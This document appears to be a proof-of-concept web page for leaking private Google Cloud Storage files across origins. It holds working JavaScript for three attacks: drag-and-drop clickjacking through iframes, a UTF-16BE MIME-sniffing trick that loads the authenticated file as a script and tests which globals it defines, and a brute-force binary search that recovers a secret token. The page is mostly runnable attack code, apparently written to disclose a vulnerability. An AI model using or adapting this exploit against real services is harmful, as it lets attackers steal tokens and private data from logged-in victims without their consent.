<style>
div.dotted {border: 1px solid;}
div { padding: 0.01em 16px; }
</style>

<h1>GCS Data Exfiltration</h1>
Authenticated GCS file URL: <input id="url" value='https://storage.cloud.google.com/nowa0/token.html' style="width: 500px;" readonly><br><br>
The iframe below shows the content of a private file hosted on GCS, a cross-origin resource.
<br>
<br>
<iframe src="https://storage.cloud.google.com/nowa0/token.html"></iframe>
<br>
<br>
<h2>Data exfiltration</h2>
<div class="dotted">
<h4>POC 1: Drag'n Drop Clickjacking (Firefox only; Disable Firefox's Enhanced Tracking Protection for the attack to work through this domain)</h4>
Drag the target file content from the iframe above and drop it over the iframe below. An javascript alert will show the leaked content.
<br>
<br>
<iframe srcdoc="<div style='top:0; left:0; position:fixed; width:100%; height:100%; background-color:yellow' ondragover='event.preventDefault()' ondrop='alert(event.dataTransfer.getData(`text`))'>Drag the file content and drop here!"></iframe>
<br>
<br>
</div>
<br>
<br>
<div class="dotted">
<h4>POC 2: MIME Sniffing - Manual verification</h4>
Please enter any data and check to see if the target file content matches.<br><br>
Input: <input id='guess' value="Hello {'token':abcd}" style="width: 500px;">
<br>
<br>
<button id="btncheck" onclick='check()'>Check</button>
<br>
<br>
</div>
<br>
<br>
<div class="dotted">
<h4>POC 3: MIME Sniffing - Bruteforce</h4>
Exfiltration point charset: <input id='charset' value='abcdefghijklmnopqstuvwxyz' style="width: 180px;">
<br>
Exfiltration point length:<input id="length" value='4' style="width: 40px;">
<br>
<br>
If you know all the data that is before or after the data you want to exfiltrate, inform them bellow. This will avoid bruteforcing unecessary content, speeding up the attack.
<br>
<br>
All data that is before exfiltration point: <input id='dataBefore' value="Hello {'token':" style="width: 100px;">
<br>
All data that is after exfiltration point: <input id='dataAfter' value="}" style="width: 100px;">
<br>
<br>
<button id="bruteforce" onclick='start()'>Bruteforce</button>
<br>
<br>
Check the browser's console for progress info.
<br>
<br>
</div>

<script>
defined = [], wasDefined = false;
var guesses;
var url;
var dataBefore;
var dataAfter;

function convertToUtf16(s){
    enc = new TextEncoder();
    dec = new TextDecoder('utf-16be');
    return  dec.decode(enc.encode(s))
    
}
    
function convertToUtf8(s){
    return unescape(escape(s).replace(/%u(..)(..)/g,'%$1%$2'));
}

function check(){
    wasDefined = true;
    document.getElementById("btncheck").textContent = "Checking...";
    url = document.getElementById("url").value;
    guess = convertToUtf16(document.getElementById('guess').value);
    window[guess] = undefined;
    loadScript(url, showResult);  
}

function showResult(){
    delete window[guess];
    document.getElementById("btncheck").textContent = "Check";
    wasDefined ? alert('The content matches!') : alert('The content doesn\'t matches');
    wasDefined = false;
}

function start(){
    document.getElementById("bruteforce").textContent = "Please wait...";
    
    charset = document.getElementById("charset").value.split('');
    url = document.getElementById("url").value;
    dataBefore = document.getElementById("dataBefore").value;
    dataAfter = document.getElementById("dataAfter").value;
    len = parseInt(document.getElementById('length').value);
    
    guesses = generateConbinations(charset, len, '');
    console.log('Number of guesses: ' + guesses.length);
    console.log(guesses);

    for (i = 0; i < guesses.length; i++) {
      delete window[guesses[i]];
    } 

    binarySearch();
}

function generateConbinations(input, length, curstr) {
    if(curstr.length == length) return [ curstr ];
    var ret = [];
    var temp = [];
    for(var i = 0; i < input.length; i++) {
        temp = generateConbinations(input, length, curstr + input[i]);
        if (temp.length == 1){
            temp[0] = convertToUtf16(dataBefore + temp[0] + dataAfter);
        }
        ret.push.apply(ret, temp);
    }
    
    return ret;
}

function loadScript(url, callback){
    var s = document.createElement('script'); 
    s.src = url; 
    s.charset="utf-16be"; 
    s.onload = callback; 
    document.head.appendChild(s);  
}
 
function binarySearch() {
    var i, split, next;
    if (wasDefined && defined.length === 1) {
        alert('Leaked content: ' + convertToUtf8(defined[0]));
        document.getElementById("bruteforce").textContent = "Bruteforce";
    } else if (!wasDefined && guesses.length === 1) {
        alert('Leaked content: ' + convertToUtf8(guesses[0]));
        document.getElementById("bruteforce").textContent = "Bruteforce";
    } else {

    for (i = 0; i < defined.length; i++) {
      delete window[defined[i]];
    }
         
    next = wasDefined ? defined : guesses;
    if (wasDefined){
        console.log('Match is in variable group 1');     
    }else{
        console.log('Match is in variable group 2');
    }

    split = Math.floor(next.length / 2);
    console.log('Dividing matched group');
    defined = next.slice(0, split);
    guesses = next.slice(split, next.length);
     
    for (i = 0; i < defined.length; i++) {
      window[defined[i]] = undefined;
    }
     
    wasDefined = true;
 
    loadScript(url, binarySearch);
  }
}
 
window.onerror = function() {
  wasDefined = false;
  return true;
}
</script>